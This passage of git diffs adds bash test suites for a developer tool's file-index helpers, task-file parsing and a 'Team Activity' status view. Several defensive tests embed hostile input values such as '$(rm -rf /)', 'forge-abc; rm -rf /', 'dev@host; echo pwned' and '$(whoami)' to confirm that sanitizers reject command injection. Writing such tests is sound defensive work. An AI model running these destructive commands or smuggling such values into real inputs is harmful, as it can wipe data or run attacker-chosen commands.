-  assert_exit_code "injection rejected (non-zero exit)" 1 "$rc"
+  assert_exit_code "injection rejected (non-zero exit)" 2 "$rc"
   assert_contains "shows error" "invalid" "$output"
 
   teardown
@@ -251,7 +251,7 @@ test_injection_files_rejected() {
   local output rc=0
   output="$(bash "$SUT" --files '$(whoami)/evil.ts' 2>&1)" || rc=$?
 
-  assert_exit_code "injection in files rejected" 1 "$rc"
+  assert_exit_code "injection in files rejected" 2 "$rc"
   assert_contains "shows error" "invalid" "$output"
 
   teardown

--- a/tests/file-index.test.sh
+++ b/tests/file-index.test.sh
@@ -413,6 +413,237 @@ test_valid_developer_formats() {
   teardown
 }
 
+# ── Test: file_index_update_from_tasks parses task file correctly ──────────
+
+SYNC_UTILS="$REPO_ROOT/scripts/sync-utils.sh"
+
+test_update_from_tasks_parses_task_file() {
+  echo "TEST: file_index_update_from_tasks parses File(s): lines from task file"
+  setup
+
+  # Create a mock task file with File(s): lines
+  local task_file="$TEST_TMP/task-file.md"
+  cat > "$task_file" <<'TASKEOF'
+### Task 1: Pluggable sync backend abstraction
+File(s): `scripts/sync-utils.sh`
+What to implement: Sync backend system
+
+### Task 2: Sync branch/remote detection utility
+File(s): `scripts/sync-utils.sh` (extend), `src/lib/status.ts`
+What to implement: Functions for branch and inline backends
+
+### Task 3: No files line
+What to implement: Something without a File(s): line
+TASKEOF
+
+  source "$SUT"
+  # Mock get_session_identity so we don't depend on git config
+  get_session_identity() { printf '%s' "testdev@testhost"; }
+
+  file_index_update_from_tasks "forge-task1" "$task_file"
+
+  local output
+  output="$(file_index_get "forge-task1")"
+
+  # Should have created an entry
+  local issue_id
+  issue_id="$(printf '%s' "$output" | jq -r '.issue_id')"
+  assert_eq "issue_id set correctly" "forge-task1" "$issue_id"
+
+  # Should have extracted 2 unique files from the task file
+  local files_count
+  files_count="$(printf '%s' "$output" | jq '.files | length')"
+  assert_eq "extracted 2 unique files" "2" "$files_count"
+
+  # Should contain both file paths (without annotations like "(extend)")
+  local has_sync_utils has_status
+  has_sync_utils="$(printf '%s' "$output" | jq '[.files[] | select(. == "scripts/sync-utils.sh")] | length')"
+  has_status="$(printf '%s' "$output" | jq '[.files[] | select(. == "src/lib/status.ts")] | length')"
+  assert_eq "contains scripts/sync-utils.sh" "1" "$has_sync_utils"
+  assert_eq "contains src/lib/status.ts" "1" "$has_status"
+
+  # Should have derived modules from directory paths
+  local has_scripts_mod has_src_mod
+  has_scripts_mod="$(printf '%s' "$output" | jq '[.modules[] | select(. == "scripts/")] | length')"
+  has_src_mod="$(printf '%s' "$output" | jq '[.modules[] | select(. == "src/lib/")] | length')"
+  assert_eq "module scripts/ derived" "1" "$has_scripts_mod"
+  assert_eq "module src/lib/ derived" "1" "$has_src_mod"
+
+  # Developer should be set from session identity
+  local developer
+  developer="$(printf '%s' "$output" | jq -r '.developer')"
+  assert_eq "developer from session identity" "testdev@testhost" "$developer"
+
+  teardown
+}
+
+# ── Test: file_index_update_from_tasks with no task file (fallback) ───────
+
+test_update_from_tasks_no_task_file() {
+  echo "TEST: file_index_update_from_tasks falls back with confidence:low when no task file"
+  setup
+
+  source "$SUT"
+  get_session_identity() { printf '%s' "testdev@testhost"; }
+
+  file_index_update_from_tasks "forge-nofile" "/nonexistent/path/task-file.md"
+
+  local output
+  output="$(file_index_get "forge-nofile")"
+
+  # Should still create an entry
+  local issue_id
+  issue_id="$(printf '%s' "$output" | jq -r '.issue_id')"
+  assert_eq "entry created for missing task file" "forge-nofile" "$issue_id"
+
+  # Should have confidence: low
+  local confidence
+  confidence="$(printf '%s' "$output" | jq -r '.confidence')"
+  assert_eq "confidence is low for missing task file" "low" "$confidence"
+
+  # Files should be empty array
+  local files_count
+  files_count="$(printf '%s' "$output" | jq '.files | length')"
+  assert_eq "files empty for missing task file" "0" "$files_count"
+
+  teardown
+}
+
+# ── Test: file_index_update_from_tasks with no File(s): lines (fallback) ──
+
+test_update_from_tasks_no_files_lines() {
+  echo "TEST: file_index_update_from_tasks falls back when task file has no File(s): lines"
+  setup
+
+  local task_file="$TEST_TMP/no-files-task.md"
+  cat > "$task_file" <<'TASKEOF'
+### Task 1: Something
+What to implement: Something without file references
+TASKEOF
+
+  source "$SUT"
+  get_session_identity() { printf '%s' "testdev@testhost"; }
+
+  file_index_update_from_tasks "forge-nolines" "$task_file"
+
+  local output
+  output="$(file_index_get "forge-nolines")"
+
+  # Should have confidence: low
+  local confidence
+  confidence="$(printf '%s' "$output" | jq -r '.confidence')"
+  assert_eq "confidence is low for no File(s): lines" "low" "$confidence"
+
+  teardown
+}
+
+# ── Test: file_index_update_from_tasks tombstones on close ────────────────
+
+test_update_from_tasks_tombstone_on_close() {
+  echo "TEST: file_index_update_from_tasks with closed status creates tombstone"
+  setup
+
+  local task_file="$TEST_TMP/task-close.md"
+  cat > "$task_file" <<'TASKEOF'
+### Task 1: Something
+File(s): `src/index.ts`
+TASKEOF
+
+  source "$SUT"
+  get_session_identity() { printf '%s' "testdev@testhost"; }
+
+  # First add an entry
+  file_index_update_from_tasks "forge-closing" "$task_file"
+
+  # Verify it exists
+  local before
+  before="$(file_index_get "forge-closing")"
+  local before_id
+  before_id="$(printf '%s' "$before" | jq -r '.issue_id')"
+  assert_eq "entry exists before close" "forge-closing" "$before_id"
+
+  # Now call with "closed" action
+  file_index_update_from_tasks "forge-closing" "$task_file" "closed"
+
+  # Should be tombstoned
+  local after
+  after="$(file_index_get "forge-closing")"
+  assert_eq "entry tombstoned after close" "null" "$after"
+
+  teardown
+}
+
+# ── Test: file_index_update_from_tasks strips annotations ─────────────────
+
+test_update_from_tasks_strips_annotations() {
+  echo "TEST: file_index_update_from_tasks strips annotations like (extend), (run script only)"
+  setup
+
+  local task_file="$TEST_TMP/task-annotated.md"
+  cat > "$task_file" <<'TASKEOF'
+### Task 7: Auto-sync at Forge command entry
+File(s): `scripts/sync-utils.sh` (extend), `.claude/commands/plan.md`, `.claude/commands/dev.md` (run script only), `.claude/commands/status.md`
+TASKEOF
+
+  source "$SUT"
+  get_session_identity() { printf '%s' "testdev@testhost"; }
+
+  file_index_update_from_tasks "forge-annot" "$task_file"
+
+  local output
+  output="$(file_index_get "forge-annot")"
+
+  # Should have 4 files, all without annotations
+  local files_count
+  files_count="$(printf '%s' "$output" | jq '.files | length')"
+  assert_eq "4 files extracted" "4" "$files_count"
+
+  # Verify no annotations leaked into paths
+  local has_paren
+  has_paren="$(printf '%s' "$output" | jq '[.files[] | select(contains("("))] | length')"
+  assert_eq "no parenthetical annotations in paths" "0" "$has_paren"
+
+  # Verify specific files present
+  local has_plan
+  has_plan="$(printf '%s' "$output" | jq '[.files[] | select(. == ".claude/commands/plan.md")] | length')"
+  assert_eq "plan.md extracted" "1" "$has_plan"
+
+  teardown
+}
+
+# ── Test: file_index_update_from_tasks rejects injection in file paths ────
+
+test_update_from_tasks_rejects_injection() {
+  echo "TEST: file_index_update_from_tasks sanitizes malicious file paths"
+  setup
+
+  local task_file="$TEST_TMP/task-injection.md"
+  cat > "$task_file" <<'TASKEOF'
+### Task 1: Injection attempt
+File(s): `src/legit.ts`, `$(rm -rf /)`
+TASKEOF
+
+  source "$SUT"
+  get_session_identity() { printf '%s' "testdev@testhost"; }
+
+  file_index_update_from_tasks "forge-inject" "$task_file"
+
+  local output
+  output="$(file_index_get "forge-inject")"
+
+  # The injection path should be stripped/excluded
+  local has_injection
+  has_injection="$(printf '%s' "$output" | jq '[.files[] | select(contains("rm"))] | length')"
+  assert_eq "injection path excluded" "0" "$has_injection"
+
+  # The legit file should be present
+  local has_legit
+  has_legit="$(printf '%s' "$output" | jq '[.files[] | select(. == "src/legit.ts")] | length')"
+  assert_eq "legit file kept" "1" "$has_legit"
+
+  teardown
+}
+
 # ── Run all tests ─────────────────────────────────────────────────────────
 
 echo "=== file-index.sh test suite ==="
@@ -431,6 +662,12 @@ test_sanitize_developer
 test_sanitize_command_substitution
 test_read_empty_file
 test_valid_developer_formats
+test_update_from_tasks_parses_task_file
+test_update_from_tasks_no_task_file
+test_update_from_tasks_no_files_lines
+test_update_from_tasks_tombstone_on_close
+test_update_from_tasks_strips_annotations
+test_update_from_tasks_rejects_injection
 
 echo ""
 echo "=== Results: $PASS passed, $FAIL failed ==="

--- a/tests/file-index.test.sh
+++ b/tests/file-index.test.sh
@@ -1,0 +1,441 @@
+#!/usr/bin/env bash
+# tests/file-index.test.sh — Tests for file-index.sh JSONL helpers
+#
+# Usage: bash tests/file-index.test.sh
+# Exit 0 = all pass, exit 1 = any fail.
+
+set -euo pipefail
+
+# ── Test harness ──────────────────────────────────────────────────────────
+
+PASS=0
+FAIL=0
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/.." && pwd)"
+SUT="$REPO_ROOT/scripts/file-index.sh"
+
+# Each test gets its own temp dir with a .beads/ subdirectory
+TEST_TMP=""
+
+setup() {
+  TEST_TMP="$(mktemp -d)"
+  mkdir -p "$TEST_TMP/.beads"
+  # Override FILE_INDEX_ROOT so the script writes to our temp dir
+  export FILE_INDEX_ROOT="$TEST_TMP"
+}
+
+teardown() {
+  [[ -n "$TEST_TMP" ]] && rm -rf "$TEST_TMP"
+  unset FILE_INDEX_ROOT
+}
+
+assert_eq() {
+  local label="$1" expected="$2" actual="$3"
+  if [[ "$expected" == "$actual" ]]; then
+    PASS=$((PASS + 1))
+    echo "  PASS: $label"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: $label"
+    echo "    expected: $expected"
+    echo "    actual:   $actual"
+  fi
+}
+
+assert_contains() {
+  local label="$1" needle="$2" haystack="$3"
+  if printf '%s' "$haystack" | grep -qF "$needle"; then
+    PASS=$((PASS + 1))
+    echo "  PASS: $label"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: $label"
+    echo "    expected to contain: $needle"
+    echo "    actual: $haystack"
+  fi
+}
+
+assert_not_contains() {
+  local label="$1" needle="$2" haystack="$3"
+  if ! printf '%s' "$haystack" | grep -qF "$needle"; then
+    PASS=$((PASS + 1))
+    echo "  PASS: $label"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: $label"
+    echo "    expected NOT to contain: $needle"
+    echo "    actual: $haystack"
+  fi
+}
+
+assert_exit_code() {
+  local label="$1" expected="$2" actual="$3"
+  if [[ "$expected" -eq "$actual" ]]; then
+    PASS=$((PASS + 1))
+    echo "  PASS: $label"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: $label"
+    echo "    expected exit code: $expected"
+    echo "    actual exit code:   $actual"
+  fi
+}
+
+# ── Test: file_index_add creates valid JSONL ──────────────────────────────
+
+test_add_creates_valid_jsonl() {
+  echo "TEST: file_index_add creates valid JSONL"
+  setup
+
+  source "$SUT"
+  file_index_add "forge-abc" "harsha@laptop" '["src/lib/status.ts"]' '["src/lib/"]'
+
+  local jsonl_file="$TEST_TMP/.beads/file-index.jsonl"
+
+  # File should exist
+  if [[ -f "$jsonl_file" ]]; then
+    PASS=$((PASS + 1))
+    echo "  PASS: JSONL file created"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: JSONL file not created"
+    teardown
+    return
+  fi
+
+  # Should have exactly 1 line
+  local line_count
+  line_count="$(wc -l < "$jsonl_file" | tr -d ' ')"
+  assert_eq "exactly 1 line" "1" "$line_count"
+
+  # Line should be valid JSON
+  local line
+  line="$(head -1 "$jsonl_file")"
+  if printf '%s' "$line" | jq empty 2>/dev/null; then
+    PASS=$((PASS + 1))
+    echo "  PASS: line is valid JSON"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: line is not valid JSON"
+    teardown
+    return
+  fi
+
+  # Check fields
+  local issue_id developer tombstone
+  issue_id="$(printf '%s' "$line" | jq -r '.issue_id')"
+  developer="$(printf '%s' "$line" | jq -r '.developer')"
+  tombstone="$(printf '%s' "$line" | jq -r '.tombstone')"
+
+  assert_eq "issue_id field" "forge-abc" "$issue_id"
+  assert_eq "developer field" "harsha@laptop" "$developer"
+  assert_eq "tombstone is false" "false" "$tombstone"
+
+  # Check files array
+  local files_count
+  files_count="$(printf '%s' "$line" | jq '.files | length')"
+  assert_eq "files has 1 element" "1" "$files_count"
+
+  local first_file
+  first_file="$(printf '%s' "$line" | jq -r '.files[0]')"
+  assert_eq "first file path" "src/lib/status.ts" "$first_file"
+
+  # Check modules array
+  local modules_count
+  modules_count="$(printf '%s' "$line" | jq '.modules | length')"
+  assert_eq "modules has 1 element" "1" "$modules_count"
+
+  # Check updated_at is present and looks like ISO 8601
+  local updated_at
+  updated_at="$(printf '%s' "$line" | jq -r '.updated_at')"
+  if [[ "$updated_at" =~ ^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}Z$ ]]; then
+    PASS=$((PASS + 1))
+    echo "  PASS: updated_at is ISO 8601"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: updated_at format invalid: $updated_at"
+  fi
+
+  teardown
+}
+
+# ── Test: file_index_add appends (does not overwrite) ─────────────────────
+
+test_add_appends() {
+  echo "TEST: file_index_add appends multiple entries"
+  setup
+
+  source "$SUT"
+  file_index_add "forge-aaa" "dev1@host" '["a.ts"]' '["src/"]'
+  file_index_add "forge-bbb" "dev2@host" '["b.ts"]' '["lib/"]'
+
+  local jsonl_file="$TEST_TMP/.beads/file-index.jsonl"
+  local line_count
+  line_count="$(wc -l < "$jsonl_file" | tr -d ' ')"
+  assert_eq "2 lines after 2 adds" "2" "$line_count"
+
+  # Second line should have forge-bbb
+  local second_id
+  second_id="$(sed -n '2p' "$jsonl_file" | jq -r '.issue_id')"
+  assert_eq "second entry issue_id" "forge-bbb" "$second_id"
+
+  teardown
+}
+
+# ── Test: file_index_remove creates tombstone ─────────────────────────────
+
+test_remove_creates_tombstone() {
+  echo "TEST: file_index_remove creates tombstone entry"
+  setup
+
+  source "$SUT"
+  file_index_add "forge-xyz" "dev@host" '["x.ts"]' '["src/"]'
+  file_index_remove "forge-xyz"
+
+  local jsonl_file="$TEST_TMP/.beads/file-index.jsonl"
+  local line_count
+  line_count="$(wc -l < "$jsonl_file" | tr -d ' ')"
+  assert_eq "2 lines (add + tombstone)" "2" "$line_count"
+
+  # Second line should be tombstone
+  local tombstone
+  tombstone="$(sed -n '2p' "$jsonl_file" | jq -r '.tombstone')"
+  assert_eq "tombstone is true" "true" "$tombstone"
+
+  # Issue ID should match
+  local issue_id
+  issue_id="$(sed -n '2p' "$jsonl_file" | jq -r '.issue_id')"
+  assert_eq "tombstone issue_id" "forge-xyz" "$issue_id"
+
+  teardown
+}
+
+# ── Test: file_index_read resolves LWW ────────────────────────────────────
+
+test_read_resolves_lww() {
+  echo "TEST: file_index_read resolves LWW (last-write-wins)"
+  setup
+
+  source "$SUT"
+  # Add two entries for the same issue (simulating an update)
+  file_index_add "forge-lww" "dev@host" '["old.ts"]' '["old/"]'
+  sleep 1  # Ensure different timestamp
+  file_index_add "forge-lww" "dev@host" '["new.ts"]' '["new/"]'
+  # Add a different issue
+  file_index_add "forge-other" "dev2@host" '["other.ts"]' '["other/"]'
+
+  local output
+  output="$(file_index_read)"
+
+  # Should have 2 active entries (LWW deduplicates forge-lww)
+  local count
+  count="$(printf '%s' "$output" | jq '. | length')"
+  assert_eq "2 active entries after LWW" "2" "$count"
+
+  # forge-lww should show the latest files (new.ts)
+  local lww_file
+  lww_file="$(printf '%s' "$output" | jq -r '.[] | select(.issue_id == "forge-lww") | .files[0]')"
+  assert_eq "LWW keeps latest files" "new.ts" "$lww_file"
+
+  teardown
+}
+
+# ── Test: file_index_read excludes tombstoned entries ─────────────────────
+
+test_read_excludes_tombstoned() {
+  echo "TEST: file_index_read excludes tombstoned entries"
+  setup
+
+  source "$SUT"
+  file_index_add "forge-alive" "dev@host" '["alive.ts"]' '["src/"]'
+  file_index_add "forge-dead" "dev@host" '["dead.ts"]' '["lib/"]'
+  file_index_remove "forge-dead"
+
+  local output
+  output="$(file_index_read)"
+
+  # Should have 1 active entry
+  local count
+  count="$(printf '%s' "$output" | jq '. | length')"
+  assert_eq "1 active entry (tombstoned excluded)" "1" "$count"
+
+  # Only forge-alive should remain
+  local alive_id
+  alive_id="$(printf '%s' "$output" | jq -r '.[0].issue_id')"
+  assert_eq "surviving entry is forge-alive" "forge-alive" "$alive_id"
+
+  teardown
+}
+
+# ── Test: file_index_get returns single entry ─────────────────────────────
+
+test_get_single_entry() {
+  echo "TEST: file_index_get returns single entry"
+  setup
+
+  source "$SUT"
+  file_index_add "forge-get1" "dev@host" '["a.ts","b.ts"]' '["src/","lib/"]'
+  file_index_add "forge-get2" "dev2@host" '["c.ts"]' '["test/"]'
+
+  local output
+  output="$(file_index_get "forge-get1")"
+
+  # Should be a single JSON object (not array)
+  local issue_id
+  issue_id="$(printf '%s' "$output" | jq -r '.issue_id')"
+  assert_eq "get returns correct issue" "forge-get1" "$issue_id"
+
+  local files_count
+  files_count="$(printf '%s' "$output" | jq '.files | length')"
+  assert_eq "get returns correct files count" "2" "$files_count"
+
+  teardown
+}
+
+# ── Test: file_index_get returns empty for missing issue ──────────────────
+
+test_get_missing_returns_empty() {
+  echo "TEST: file_index_get returns null for missing issue"
+  setup
+
+  source "$SUT"
+  file_index_add "forge-exists" "dev@host" '["a.ts"]' '["src/"]'
+
+  local output
+  output="$(file_index_get "forge-missing")"
+
+  assert_eq "missing issue returns null" "null" "$output"
+
+  teardown
+}
+
+# ── Test: file_index_get returns null for tombstoned issue ────────────────
+
+test_get_tombstoned_returns_null() {
+  echo "TEST: file_index_get returns null for tombstoned issue"
+  setup
+
+  source "$SUT"
+  file_index_add "forge-tomb" "dev@host" '["a.ts"]' '["src/"]'
+  file_index_remove "forge-tomb"
+
+  local output
+  output="$(file_index_get "forge-tomb")"
+
+  assert_eq "tombstoned issue returns null" "null" "$output"
+
+  teardown
+}
+
+# ── Test: sanitize rejects injection in issue_id ──────────────────────────
+
+test_sanitize_issue_id() {
+  echo "TEST: rejects invalid issue_id (injection attempt)"
+  setup
+
+  source "$SUT"
+  local rc=0
+  file_index_add 'forge-abc; rm -rf /' "dev@host" '["a.ts"]' '["src/"]' 2>/dev/null || rc=$?
+
+  assert_exit_code "invalid issue_id rejected" 1 "$rc"
+
+  teardown
+}
+
+# ── Test: sanitize rejects injection in developer ─────────────────────────
+
+test_sanitize_developer() {
+  echo "TEST: rejects invalid developer (injection attempt)"
+  setup
+
+  source "$SUT"
+  local rc=0
+  file_index_add "forge-ok" 'dev@host; echo pwned' '["a.ts"]' '["src/"]' 2>/dev/null || rc=$?
+
+  assert_exit_code "invalid developer rejected" 1 "$rc"
+
+  teardown
+}
+
+# ── Test: sanitize rejects $(command) in issue_id ─────────────────────────
+
+test_sanitize_command_substitution() {
+  echo "TEST: rejects command substitution in issue_id"
+  setup
+
+  source "$SUT"
+  local rc=0
+  file_index_add '$(whoami)' "dev@host" '["a.ts"]' '["src/"]' 2>/dev/null || rc=$?
+
+  assert_exit_code "command substitution rejected" 1 "$rc"
+
+  teardown
+}
+
+# ── Test: file_index_read on empty/missing file ───────────────────────────
+
+test_read_empty_file() {
+  echo "TEST: file_index_read returns empty array for missing file"
+  setup
+
+  source "$SUT"
+  local output
+  output="$(file_index_read)"
+
+  assert_eq "empty file returns empty array" "[]" "$output"
+
+  teardown
+}
+
+# ── Test: valid developer formats accepted ────────────────────────────────
+
+test_valid_developer_formats() {
+  echo "TEST: valid developer identity formats accepted"
+  setup
+
+  source "$SUT"
+
+  # user@hostname
+  local rc=0
+  file_index_add "forge-d1" "user@hostname" '["a.ts"]' '["src/"]' || rc=$?
+  assert_exit_code "user@hostname accepted" 0 "$rc"
+
+  # user.name+tag@host
+  rc=0
+  file_index_add "forge-d2" "user.name+tag@host" '["b.ts"]' '["lib/"]' || rc=$?
+  assert_exit_code "user.name+tag@host accepted" 0 "$rc"
+
+  # simple-user
+  rc=0
+  file_index_add "forge-d3" "simple-user" '["c.ts"]' '["test/"]' || rc=$?
+  assert_exit_code "simple-user accepted" 0 "$rc"
+
+  teardown
+}
+
+# ── Run all tests ─────────────────────────────────────────────────────────
+
+echo "=== file-index.sh test suite ==="
+echo ""
+
+test_add_creates_valid_jsonl
+test_add_appends
+test_remove_creates_tombstone
+test_read_resolves_lww
+test_read_excludes_tombstoned
+test_get_single_entry
+test_get_missing_returns_empty
+test_get_tombstoned_returns_null
+test_sanitize_issue_id
+test_sanitize_developer
+test_sanitize_command_substitution
+test_read_empty_file
+test_valid_developer_formats
+
+echo ""
+echo "=== Results: $PASS passed, $FAIL failed ==="
+
+if [[ $FAIL -gt 0 ]]; then
+  exit 1
+fi
+exit 0

--- a/tests/smart-status-crossdev.test.sh
+++ b/tests/smart-status-crossdev.test.sh
@@ -1,0 +1,340 @@
+#!/usr/bin/env bash
+# tests/smart-status-crossdev.test.sh — Tests for cross-developer visibility in smart-status.sh
+#
+# Usage: bash tests/smart-status-crossdev.test.sh
+# Exit 0 = all pass, exit 1 = any fail.
+
+set -euo pipefail
+
+# ── Test harness ──────────────────────────────────────────────────────────
+
+PASS=0
+FAIL=0
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/.." && pwd)"
+SUT="$REPO_ROOT/scripts/smart-status.sh"
+
+TEST_TMP=""
+
+setup() {
+  TEST_TMP="$(mktemp -d)"
+  mkdir -p "$TEST_TMP/.beads"
+  mkdir -p "$TEST_TMP/mock-bin"
+
+  # Create a mock bd command that returns minimal issues JSON
+  cat > "$TEST_TMP/mock-bin/bd" <<'MOCKEOF'
+#!/usr/bin/env bash
+case "$1" in
+  list)
+    # Return a single open issue so smart-status does not bail early
+    echo '[{"id":"forge-local","title":"local issue","status":"open","type":"feature","priority":"P2","updated_at":"2026-03-22T00:00:00Z"}]'
+    ;;
+  children)
+    echo '[]'
+    ;;
+  *)
+    echo '[]'
+    ;;
+esac
+MOCKEOF
+  chmod +x "$TEST_TMP/mock-bin/bd"
+
+  # Create a mock git command
+  cat > "$TEST_TMP/mock-bin/git" <<'MOCKEOF'
+#!/usr/bin/env bash
+case "$1" in
+  rev-parse)
+    # Support --verify master for BASE_BRANCH detection
+    if [[ "${2:-}" == "--verify" ]] && [[ "${3:-}" == "master" ]]; then
+      echo "abc123"
+      exit 0
+    fi
+    exit 1
+    ;;
+  worktree)
+    # Return empty — no worktrees (sessions)
+    echo ""
+    ;;
+  --version)
+    echo "git version 2.45.0"
+    ;;
+  config)
+    # For get_session_identity
+    if [[ "${2:-}" == "user.email" ]]; then
+      echo "localdev@myhost"
+    fi
+    ;;
+  *)
+    echo ""
+    ;;
+esac
+MOCKEOF
+  chmod +x "$TEST_TMP/mock-bin/git"
+
+  export FILE_INDEX_ROOT="$TEST_TMP"
+  export SMART_STATUS_IDENTITY="localdev@myhost"
+}
+
+teardown() {
+  [[ -n "$TEST_TMP" ]] && rm -rf "$TEST_TMP"
+  unset FILE_INDEX_ROOT
+  unset SMART_STATUS_IDENTITY
+}
+
+assert_eq() {
+  local label="$1" expected="$2" actual="$3"
+  if [[ "$expected" == "$actual" ]]; then
+    PASS=$((PASS + 1))
+    echo "  PASS: $label"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: $label"
+    echo "    expected: $expected"
+    echo "    actual:   $actual"
+  fi
+}
+
+assert_contains() {
+  local label="$1" needle="$2" haystack="$3"
+  if printf '%s' "$haystack" | grep -qF "$needle"; then
+    PASS=$((PASS + 1))
+    echo "  PASS: $label"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: $label"
+    echo "    expected to contain: $needle"
+    echo "    actual: $haystack"
+  fi
+}
+
+assert_not_contains() {
+  local label="$1" needle="$2" haystack="$3"
+  if ! printf '%s' "$haystack" | grep -qF "$needle"; then
+    PASS=$((PASS + 1))
+    echo "  PASS: $label"
+  else
+    FAIL=$((FAIL + 1))
+    echo "  FAIL: $label"
+    echo "    expected NOT to contain: $needle"
+    echo "    actual: $haystack"
+  fi
+}
+
+# Helper: populate file index with entries for OTHER developers
+populate_other_dev_entries() {
+  local jsonl_file="$TEST_TMP/.beads/file-index.jsonl"
+
+  # dev-b working on forge-xyz, touching src/lib/ and scripts/
+  local ts_recent
+  ts_recent="$(date -u +%Y-%m-%dT%H:%M:%SZ)"
+  printf '%s\n' "$(jq -n -c \
+    --arg ts "$ts_recent" \
+    '{issue_id:"forge-xyz", developer:"dev-b@laptop-2", files:["src/lib/helpers.ts","scripts/build.sh"], modules:["src/lib/","scripts/"], updated_at:$ts, tombstone:false}')" >> "$jsonl_file"
+
+  # dev-c working on forge-abc, but stale (3 days ago)
+  local ts_stale
+  ts_stale="$(date -u -d '3 days ago' +%Y-%m-%dT%H:%M:%SZ 2>/dev/null || date -u -v-3d +%Y-%m-%dT%H:%M:%SZ 2>/dev/null || echo '2026-03-19T00:00:00Z')"
+  printf '%s\n' "$(jq -n -c \
+    --arg ts "$ts_stale" \
+    '{issue_id:"forge-abc", developer:"dev-c@laptop-3", files:["docs/README.md"], modules:["docs/"], updated_at:$ts, tombstone:false}')" >> "$jsonl_file"
+}
+
+# Helper: populate file index with an entry for the LOCAL developer
+populate_local_dev_entry() {
+  local jsonl_file="$TEST_TMP/.beads/file-index.jsonl"
+
+  local ts_recent
+  ts_recent="$(date -u +%Y-%m-%dT%H:%M:%SZ)"
+  # localdev@myhost is working on src/lib/ — overlaps with dev-b
+  printf '%s\n' "$(jq -n -c \
+    --arg ts "$ts_recent" \
+    '{issue_id:"forge-local", developer:"localdev@myhost", files:["src/lib/status.ts"], modules:["src/lib/"], updated_at:$ts, tombstone:false}')" >> "$jsonl_file"
+}
+
+# ── Test: Team Activity section appears in text output when other devs exist ──
+
+test_team_activity_section_appears() {
+  echo "TEST: Team Activity section appears when other devs have file index entries"
+  setup
+  populate_other_dev_entries
+  populate_local_dev_entry
+
+  local output
+  output="$(BD_CMD="$TEST_TMP/mock-bin/bd" GIT_CMD="$TEST_TMP/mock-bin/git" NO_COLOR=1 bash "$SUT" 2>/dev/null)" || true
+
+  assert_contains "Team Activity header present" "Team Activity" "$output"
+  assert_contains "dev-b shown" "dev-b@laptop-2" "$output"
+  assert_contains "dev-c shown" "dev-c@laptop-3" "$output"
+
+  teardown
+}
+
+# ── Test: Current developer is excluded from Team Activity ──
+
+test_current_dev_excluded() {
+  echo "TEST: Current developer is excluded from Team Activity section"
+  setup
+  populate_other_dev_entries
+  populate_local_dev_entry
+
+  local output
+  output="$(BD_CMD="$TEST_TMP/mock-bin/bd" GIT_CMD="$TEST_TMP/mock-bin/git" NO_COLOR=1 bash "$SUT" 2>/dev/null)" || true
+
+  # localdev@myhost should NOT appear in Team Activity
+  # The Team Activity section content (between header and next section) should not contain localdev
+  assert_not_contains "local dev excluded from Team Activity" "localdev@myhost" "$output"
+
+  teardown
+}
+
+# ── Test: Overlap warning format is correct ──
+
+test_overlap_warning_format() {
+  echo "TEST: Overlap warning format shows module and correct annotation"
+  setup
+  populate_other_dev_entries
+  populate_local_dev_entry
+
+  local output
+  output="$(BD_CMD="$TEST_TMP/mock-bin/bd" GIT_CMD="$TEST_TMP/mock-bin/git" NO_COLOR=1 bash "$SUT" 2>/dev/null)" || true
+
+  # dev-b works on src/lib/ and localdev also works on src/lib/ — overlap expected
+  assert_contains "overlap warning for src/lib/" "Overlap" "$output"
+  assert_contains "overlap mentions src/lib/" "src/lib/" "$output"
+
+  teardown
+}
+
+# ── Test: Staleness shown for old claims ──
+
+test_staleness_shown() {
+  echo "TEST: Stale annotation shown for entries older than 48 hours"
+  setup
+  populate_other_dev_entries
+  populate_local_dev_entry
+
+  local output
+  output="$(BD_CMD="$TEST_TMP/mock-bin/bd" GIT_CMD="$TEST_TMP/mock-bin/git" NO_COLOR=1 bash "$SUT" 2>/dev/null)" || true
+
+  # dev-c's forge-abc is 3 days old — should be flagged as stale
+  assert_contains "stale annotation present" "stale" "$output"
+
+  teardown
+}
+
+# ── Test: No Team Activity section when file index is empty ──
+
+test_no_section_when_empty() {
+  echo "TEST: No Team Activity section when file index is empty"
+  setup
+  # Don't populate any entries
+
+  local output
+  output="$(BD_CMD="$TEST_TMP/mock-bin/bd" GIT_CMD="$TEST_TMP/mock-bin/git" NO_COLOR=1 bash "$SUT" 2>/dev/null)" || true
+
+  assert_not_contains "no Team Activity when empty" "Team Activity" "$output"
+
+  teardown
+}
+
+# ── Test: No Team Activity when only local dev has entries ──
+
+test_no_section_when_only_local_dev() {
+  echo "TEST: No Team Activity section when only the local developer has entries"
+  setup
+  populate_local_dev_entry
+
+  local output
+  output="$(BD_CMD="$TEST_TMP/mock-bin/bd" GIT_CMD="$TEST_TMP/mock-bin/git" NO_COLOR=1 bash "$SUT" 2>/dev/null)" || true
+
+  assert_not_contains "no Team Activity for solo dev" "Team Activity" "$output"
+
+  teardown
+}
+
+# ── Test: JSON mode includes team_activity field ──
+
+test_json_mode_includes_team_activity() {
+  echo "TEST: JSON mode includes team_activity in output"
+  setup
+  populate_other_dev_entries
+  populate_local_dev_entry
+
+  local output
+  output="$(BD_CMD="$TEST_TMP/mock-bin/bd" GIT_CMD="$TEST_TMP/mock-bin/git" bash "$SUT" --json 2>/dev/null)" || true
+
+  # JSON output should have team_activity key
+  local has_key
+  has_key="$(printf '%s' "$output" | jq 'has("team_activity")' 2>/dev/null || echo 'false')"
+  assert_eq "JSON has team_activity key" "true" "$has_key"
+
+  # team_activity should be an array
+  local ta_type
+  ta_type="$(printf '%s' "$output" | jq '.team_activity | type' 2>/dev/null || echo 'null')"
+  assert_eq "team_activity is array" '"array"' "$ta_type"
+
+  # Should have 2 entries (dev-b and dev-c, not localdev)
